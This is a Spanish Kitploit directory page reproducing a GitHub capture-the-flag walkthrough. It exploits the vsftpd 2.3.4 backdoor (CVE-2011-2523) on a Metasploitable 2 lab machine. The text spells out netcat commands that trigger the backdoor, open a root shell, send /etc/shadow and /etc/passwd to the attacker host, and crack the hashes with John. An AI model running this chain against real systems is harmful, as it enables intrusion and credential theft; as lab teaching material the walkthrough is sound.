Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
Descifrado de ContraseñasReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónCTFPruebas de PenetraciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

Guía paso a paso de CTF que explota la puerta trasera de vsftpd 2.3.4 (CVE-2011-2523) para capturar y descifrar /etc/shadow y /etc/passwd de Metasploitable 2.

Ver Repositorio
4hace 3 añosAún no revisado

Escenario Capture the Flag - CVE-2011-2523

Captura los archivos /etc/shadow y /etc/passwd descifrados del servidor vulnerable Metasploitable 2.

Configuración del entorno

Paso 1: Descargar y descomprimir una máquina virtual

Para este CTF, utilizamos VMware Workstation Pro con dos máquinas virtuales. Usamos Kali Linux como la máquina del atacante y Metasploitable 2 como la máquina vulnerable.

  • Descargar e instalar VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Descargar y extraer la máquina virtual de Kali Linux: https://www.kali.org/get-kali/
  • Descargar y extraer la máquina virtual de Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Paso 2: Abrir las máquinas virtuales de Kali Linux y Metasploitable 2 en VMware desde el archivo extraído

  • Elija la opción Open a Virtual Machine en VMware Workstation y seleccione el archivo de Kali Linux descomprimido
  • Haga clic derecho en la barra deslizante y seleccione la opción open, luego seleccione el archivo Metasploitable 2 descomprimido
  • Pulse el botón Play virtual machine en ambas máquinas virtuales
  • Cuando se le solicite seleccionar la opción I moved It o I copied It, seleccione la opción I copied It

Paso 3: Iniciar sesión

  • Inicie sesión en Kali Linux usando kali como nombre de usuario y contraseña
  • Inicie sesión en Metasploitable usando msfadmin como nombre de usuario y contraseña

Paso 4: Registrar la dirección IP de la máquina virtual Metasploitable

  • Ejecute ip addr show y registre la dirección IP de la sección inet

Solución

Massachusetts Institute of Technology Research and Engineering detallan CVE-2011-2523 como una vulnerabilidad y exposición común donde vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.

Paso 1: Buscar puertos abiertos en la máquina Metasploitable usando el servicio FTP

  • nmap <vulnerable-machine-ip-address>
  • el escaneo nmap debería mostrar un puerto abierto en el puerto 21 usando el servicio ftp

Paso 2: Intentar conectarse con NetCat al puerto abierto

  • nc <vulnerable-machine-ip-address> 21
  • El nombre de usuario es cualquier cadena que termine con :), introduzca user <string>:)
  • Cuando se solicite una contraseña, introduzca cualquier cadena pass <string>
  • Luego salga de la conexión usando ^C [CTRL + C]; se ha abierto un shell con acceso root a Metasploitable en el puerto 6200.

Paso 3: Conectarse al shell en el puerto 6200 de la máquina vulnerable

  • nc -v <vulnerable-machine-ip-address> 6200
  • Muestre la dirección IP de la conexión actual con ip addr show
  • Muestre que se otorgó acceso root usando whoami

Paso 4: Copiar los archivos /etc/shadow y /etc/passwd a otro archivo

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

Paso 5: Enviar los archivos copiados a la máquina Kali Linux usando NetCat

  • En la máquina del atacante, busque la dirección IP en inet usando el comando ip addr show
  • Escuche los archivos usando nc -l -p 1234 > shadow.txt en la máquina del atacante
  • En el shell root de Metasploitable, nc -w 3 <destination-ip> 1234 < shadow.txt
  • Repita para el archivo passwd

Paso 5: Formatear el archivo shadow al formato de la herramienta John

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • Observe el archivo usando cat unshadowed-input; debe contener el nombre de usuario y la contraseña almacenados

Paso 6: Descifrar el archivo shadow usando el comando John y la lista de palabras

  • Utilice la lista de palabras rockyou.txt para descifrar los hash usando john
  • Descomprima el archivo de la lista de palabras en Kali Linux usando sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • Cuando se solicite una contraseña, use la contraseña de administrador predeterminada para Kali Linux: kali
  • Descifre las contraseñas usando john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt
  • Vea las contraseñas descifradas con john –show unshadowed-input
Descargar herramienta